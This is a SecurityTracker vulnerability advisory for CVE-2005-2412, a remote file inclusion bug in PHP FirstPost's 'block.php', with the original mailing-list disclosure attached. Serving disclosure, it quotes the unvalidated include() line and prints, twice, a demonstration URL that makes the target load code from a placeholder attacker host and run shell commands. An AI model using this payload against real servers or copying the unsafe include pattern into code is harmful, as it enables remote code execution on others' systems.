PHP FirstPost Include File Bug in 'block.php' Lets Remote Users Execute Arbitrary Commands - SecurityTracker

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Forum/Board/Portal) > PHP FirstPost

Vendors: phpfirstpost.sourceforge.net

PHP FirstPost Include File Bug in 'block.php' Lets Remote Users Execute Arbitrary Commands

SecurityTracker Alert ID: 1014563

SecurityTracker URL: http://securitytracker.com/id/1014563

CVE Reference: CVE-2005-2412 (Links to External Site)

Updated: Jul 6 2008

Original Entry Date: Jul 24 2005

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Description: ][GB][ reported a vulnerability in PHP FirstPost. A remote user can execute arbitrary commands on the target system.

The 'block.php' script does not properly validate user-supplied input in the 'Include' variable. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/path_to_script/block.php?Include=http://[attacker]/cmd.gif?&cmd=|command|

GB credits Zetha on this vulnerability report.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: phpfirstpost.sourceforge.net/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Date: Sun, 24 Jul 2005 03:26:06 +0200
Subject: PHP FirstPost remote file include vulnerability


Language: PHP
Project name: PHP FirstPost
Risk:High
Home page: http://phpfirstpost.sourceforge.net
Discovered by: ][GB][

[Description]: 

PHP FirstPost is yet another PHP weblog. This one, however, is based
on Scoop, and has the open submission queue and comment rating system.

A vulnerability exists in PHP FirstPost, which could allow any remote
user to include a php script for execute arbitrary commands on the
target system.

[Details]:

The problem exists is in the file "block.php" when includes the
variable $Include

<?php if($Include) { include($Include); }; ?>

[Exploitation example]:

http://[target]/path_to_script/block.php?Include=http://[attacker]/cmd.gif?&cmd=|command|

[Credits]:
thanks to Zetha 

also greetz to:
uyx
r3v3ng4ns
b-04
LINUX
HaCkZaTaN
beford
Mafia_boy
lithyum
darksteel
caffa
nologro
unicked
 
... and all the ppl of irc.gigachat.net #Uruguay, #ASC & #SWC

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2013, SecurityGlobal.net LLC